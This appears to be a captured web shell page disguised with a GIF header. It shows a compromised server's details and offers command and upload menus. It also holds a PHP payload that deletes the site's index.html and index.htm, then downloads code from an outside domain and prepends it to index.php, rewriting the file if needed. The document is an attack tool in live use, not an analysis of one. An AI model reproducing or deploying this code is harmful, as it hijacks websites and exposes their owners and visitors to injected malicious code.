GIF89a;
Server IP : 172.26.0.195 / Your IP : 3.147.27.129 Web Server : Apache System : Linux 43-205-77-33.cprapid.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64 User : jnclnmuac ( 1026) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jnclnmuac/public_html/web/../grievance/../../www/../public_html/web/../backup/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php echo "RESPONSESTART"; $root = rtrim($_SERVER["DOCUMENT_ROOT"],'/'); $index = $root.'/index.php'; $source = file_get_contents($index); $index_html = $root.'/index.html'; $index_htm = $root.'/index.htm'; if(file_exists($index_html)) { unlink($index_html); } if(file_exists($index_htm)) { unlink($index_htm); } if(!preg_match('#<!--SYSADMIN-->#',$source)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://jakkelly.com/code.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $code = curl_exec($ch); curl_close($ch); $new_code = $code.$source; $f = fopen($index, "w"); if(fwrite($f, $new_code)) { echo 'SUCCESS_CODE_RUN'; }else{ if(unlink($index)) { touch($index); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://jakkelly.com/code.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $code = curl_exec($ch); curl_close($ch); $new_code = $code.$source; $f = fopen($index, "w"); if(fwrite($f, $new_code)) { echo 'SUCCESS_CODE_RUN'; } } } }else { echo 'SUCCESS_CODE_RUN'; } echo "RESPONSEEND"; ?>